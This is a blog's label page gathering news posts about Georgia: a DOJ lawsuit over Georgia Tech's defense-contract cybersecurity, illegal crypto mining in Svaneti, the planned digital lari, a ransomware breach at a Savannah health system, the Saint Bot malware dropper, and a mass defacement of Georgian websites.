Search This Blog

Powered by Blogger.

Blog Archive

Labels

Showing posts with label Georgia. Show all posts

Georgia Tech Faces DOJ Lawsuit Over Alleged Lapses in Cybersecurity for Defense Contracts

 

Researchers at the Georgia Institute of Technology, who have received over $1 billion in Defense Department contracts, are facing scrutiny for allegedly failing to secure their computers and servers, citing that doing so was too “burdensome.” Since 2013, the Department of Defense has mandated that any contractor handling sensitive data provide “adequate security” on their systems. 

However, at Georgia Tech, laboratory directors reportedly resisted developing a security plan and opposed IT department efforts to implement basic antivirus and anti-malware software. Two IT department employees filed a whistleblower lawsuit, leading the Department of Justice (DOJ) to join the case against the university and the Georgia Tech Research Corporation (GTRC), the nonprofit entity managing government contracts. The lawsuit claims that the Astrolavos Lab at Georgia Tech delayed creating and implementing a security plan, as required by the government contracts. 

When a plan was finally created in 2020, it did not cover all relevant devices, according to the DOJ. Furthermore, the lab, whose mission is to address the security of emerging technologies critical to national security, did not install or update antivirus or anti-malware tools until December 2021. The lab allegedly fabricated compliance reports sent to the Defense Department. The reasons behind these alleged security lapses reportedly stem from campus politics. The DOJ complaint suggests that researchers bringing in substantial government funding were viewed as “star quarterbacks,” using their influence to resist compliance with federal cybersecurity mandates. 

Between 2019 and 2022, GTRC secured more than $1.6 billion in government contracts, with over $423 million in 2022 alone. The whistleblowers, Christopher Craig and Kyle Koza, filed the suit under the False Claims Act, allowing them to receive a portion of any recovered funds. Georgia Tech and GTRC face nine counts, including fraud, breach of contract, negligence, and unjust enrichment, with the DOJ seeking damages to be determined at trial. The DOJ stressed the importance of cybersecurity compliance by government contractors to safeguard U.S. information against threats from malicious actors. 

Meanwhile, Georgia Tech expressed disappointment at the DOJ’s filing, arguing it misrepresents the university’s culture and integrity, claiming that the government itself had indicated that the research did not require cybersecurity restrictions. Georgia Tech has vowed to dispute the case in court, maintaining that there was no data breach or leak and reaffirming its commitment to cybersecurity and collaboration with federal agencies.  

This case is notable given recent cybersecurity threats faced by major universities, such as the University of Utah and Howard University, where ransomware attacks have resulted in significant financial losses.

Georgia goes after crypto miners

On January 10, Georgian Economy Minister Natia Turnava told reporters that the Government of Georgia and the energy distribution company Energo-pro Georgia are engaged in solving the problem of illegal mining of cryptocurrencies in the Svaneti region, which leads to an overload of power grids.

The problem is connected with a sharp increase in electricity consumption over the past year in the Mestia region of Svaneti. Widespread mining in the area is associated with low tariffs for businesses in the highland area and free electricity for the local population.

In December, the Georgian authorities had to introduce an electricity supply schedule in Mestia due to network congestion and recurring accidents.

"Of course, illegal electricity consumption is unacceptable, especially the so-called problems with household mining, which, as we know, exist there. We are working with the local government, as well as with Energo-pro Georgia, which supplies electricity to Svaneti, to solve this issue step by step," Turnava said.

She added that she does not think it is justified to involve the police in identifying the mining farms. The Minister of Economy hopes that the population itself is aware of the threat to the tourism sector inherent in the district, and will draw conclusions about this based on its own interests.

It's interesting to note that at the end of December, Mestia residents held protests demanding the closure of mining farms and accused the authorities of patronizing miners.

Energo-pro Georgia announced that it will be forced to introduce tariffs for the population in this situation. Before the New Year, local residents swore on an icon in the church that they would turn off all mining farms in the area. But after the New Year, the energy distribution company said that electricity consumption has not decreased.

According to a study by the Cambridge Center for Alternative Finance, in 2018 Georgia was in second place in terms of the amount of electricity spent on mining cryptocurrencies — 60 megawatts.

Georgia is actively working on the introduction of a digital national currency

The National Bank of Georgia is working on the introduction of the digital lari. The vice-president of the central bank, Papuna Lezhava, said that the pilot program is planned to be launched in 2022.

“85% of the world's central banks are already working on a digital currency, some are in the research stage, some are testing, some have already implemented, including China and the Bahamas. We also want to be at the forefront of this trend,” he told reporters on Tuesday.

“Digital currency is not a cryptocurrency, but the evolution of cash. It will most likely also be based on the blockchain, and will also be a fast and cheap payment method. However, unlike modern cryptocurrencies, there will be no mining. The National Bank will be the only issuer of digital currency,” noted Mr. Lezhava.

According to him, the digital lari will be able to compete with cryptocurrencies in some services, but will not have the character of speculative accumulation.

At the initial stage, the digital lari is planned to be introduced for retail sales.

The National Bank believes that the digital currency will help to increase the efficiency of the payment system and financial accessibility.

"Digital lari will become a faster and cheaper means of payment than traditional means. It will work 24 hours a day. All transactions do not require an Internet connection. But the main advantage is that it will be technologically open to other types of technologies and as compatible as possible. Today, neither paper lari nor other means of payment have such luxury," the Vice President of the Central Bank added.

Earlier, CySecurity News was reported that the Verkhovna Rada of Ukraine has adopted a law on the legalization of cryptocurrencies, which will allow using cryptocurrency for settlement transaction.

St. Joseph’s/Candler (SJ/C) Suffered a Data Breach

 

A ransomware attack on one of the leading healthcare organizations in southeast Georgia compromised personnel and patients' protected health information (PHI.). Based on the current press release, on 17 June 2021, the Georgian healthcare system, with 116 sites around the state, noticed suspicious activities in its network. 

St. Joseph's/Candler of Savannah in Georgia is a national magnet certified nursing excellence institution focusing on state-of-the-art technology and research. This non-profit health system comprises two of the oldest existing hospitals in the United States – St. Joseph's (1875) and Candler Hospitals (1804), serving 33 counties in southeast Georgia and the Low Country in South Carolina, and is also the region's leading and only religious healthcare organization. 

St. Joseph's/Candler (SJ/C) declared on 10th August that it had encountered an incident of data security leading to unauthorized access to information for patients and employees. 

SJ/C promptly took action to disconnect and protect their systems, informed federal law enforcement, and initiated a cyber-security probe. Through the inquiry, SJ/C found that, between the periods of 18 December 2020 and 17 June 2021, an unauthorized entity gained access to its IT network. During a Ransomware attack on SJ/C's IT network, this unauthorized party made documents inaccessible to the SJ/C's IT systems. 

According to the evidence provided by the publication, hackers may have accessed files containing information for both patients and personnel, including protected health information during the data breach. 

"SJ/C cannot rule out the possibility that, as a result of this incident, files containing patient and co-worker information may have been subject to unauthorized access,” it states. “This information may have included individuals' names in combination with their addresses, dates of birth, Social Security numbers, driver's license numbers, patient account numbers, billing account numbers, financial information, health insurance plan member ID numbers, medical record numbers, dates of service, provider names, and medical and clinical treatment information regarding care received from SJ/C.” 

In this data breach, the healthcare system began to send messages to the affected employees and patients. SJ/C provides free credit monitoring and identity protection assistance to those persons affected by the breach. The healthcare provider has also developed a dedicated incident response line for all those who require more knowledge about the breach. 

SJ/C suggests that the statements received from its healthcare practitioners be checked by patients whose information might have been implicated in this occurrence in its press statement. Patients shall call the provider promptly if they see services that they do not receive. 

SJ/C stated that improved security is implemented to address the ransomware attack and “will continue to adopt, additional safeguards and technical security measures to further protect and monitor its systems.”

New Malware Downloader Spotted in Targeted Campaigns

 

In recent weeks, a relatively sophisticated new malware downloader has emerged that, while not widely distributed yet, appears to be gaining momentum. Malwarebytes researchers recently discovered the Saint Bot dropper, as they have termed it, being used as part of the infection chain in targeted campaigns against government institutions in Georgia. 

Saint Bot was discovered by researchers while investigating a phishing email containing a zip file containing malware they had never seen before. The zip file included an obfuscated PowerShell script disguised as a link to a Bitcoin wallet. According to Malwarebytes, the script started a chain of infections that led to Saint Bot being dropped on the compromised system. 

In each case, the attackers used Saint Bot to drop information stealers and other malware downloaders. According to the security vendor, the new loader is probably being used by a few different threat actors, implying that there are likely other victims. 

One of the information stealers that Saint Bot has noticed dropping is Taurus, a malware tool designed to steal passwords, browser history, cookies, and data from auto-fill. The Taurus stealer can also steal FTP and email client credentials, as well as system information such as configuration details and installed software. According to Malwarebytes, while Saint Bot mostly has been observed dropping stealers, the dropper is designed to deliver any malware on a compromised system. 

Malware droppers are specialized tools designed to install various types of malware on victim systems. One of the most notable recent examples of such malware is Sunburst, the tool that was distributed via poisoned SolarWinds Orion software updates to some 18,000 organizations worldwide. In that case, the dropper was specifically designed to deliver targeted payloads on systems belonging to organizations of particular interest to the attackers. 

Basically, the downloaders are first-stage malware tools designed to deliver a wide range of secondary and tertiary commodity payloads, such as ransomware, banking Trojans, cryptominers, and other malicious tools. Some of the most popular droppers in recent years, such as Emotet, Trickbot, and Dridex, began as banking Trojans before their operators switched tactics and used their Trojans as malware-delivery vehicles for other criminals. 

Saint Bot, like many other droppers, has several unclear and anti-analysis features to help it avoid malware detection tools. It is designed to detect virtual machines and, in some cases, to detect but not execute on systems located in specific Commonwealth of Independent States countries, which include former Soviet bloc countries such as Russia, Azerbaijan, Armenia, Uzbekistan, Ukraine, and Moldova.

"As we were about to publish on this downloader, we identified a few new campaigns that appear to be politically motivated and where Saint Bot was being used as part of the infection chain. In particular, we observed malicious documents laced with exploits often accompanied by decoy files." a spokesman from Malwarebytes' threat intelligence team states. In all instances, Saint Bot was eventually used to drop stealers. 

According to Malwarebytes, while Saint Bot is not yet a widespread threat, there are indications that the malware's creators are still actively working on it. According to the security vendor, its investigation of the Saint Bot reveals that a previous version of the tool existed not long ago. " Additionally, we are also seeing new campaigns that appear to be from different customers, which would indicate that the malware author is involved in further customizing the product," a Malwarebytes spokesman said.

Georgia in a panic after a strange cyberattack


On October 28, several hundred websites in Georgia were attacked by hackers. As a result of the cyberattack, several Georgian TV companies stopped broadcasting. The cyberattack was also carried out on the website of the administration of the President of Georgia Salome Zurabishvili. When the site was opened, a photo of the runaway ex-President of Georgia appeared with the inscription: "I will be back." The damage, according to preliminary data, is very large.

The State Security Service and the Ministry of Internal Affairs with the support of partner countries are investigating a massive cyber attack on public and private sites in Georgia.

The Georgian Ministry of Internal Affairs admitted on Tuesday that the attack could come from both Georgian territory and from abroad.

Political scientist Tornike Gordadze, who held the post of minister in the government of Saakashvili, believes that this is a vivid example of "the ineffective work of the government to ensure security against possible threats, including from Russia."

In addition, the French Daily Le Monde saw the Russian connection in a large-scale cyberattack.

According to the newspaper, the current Georgian authorities are taking new steps to improve relations with the Kremlin in the hope of resuming trade with the Russian neighbor, as well as the extradition of alleged criminals. The hacker Yaroslav Sumbayev, who was arrested in Georgia in 2018 and suspected of involvement in the murder of Colonel Evgenia Shishkina, who was investigating economic crimes and corruption offenses, was handed over to Russian authorities on October 24, despite a statement by his lawyer regarding the risk of "inhuman treatment." The publication believes that a large-scale cyber attack could be a retaliation from the hacker community.

Former analyst of the Georgian National Security Council and political affairs assistant to the Prime Minister of Georgia, political analyst Tornike Sharashenidze, did not rule out "the involvement of the Russian Federation in the hacker attack in Georgia."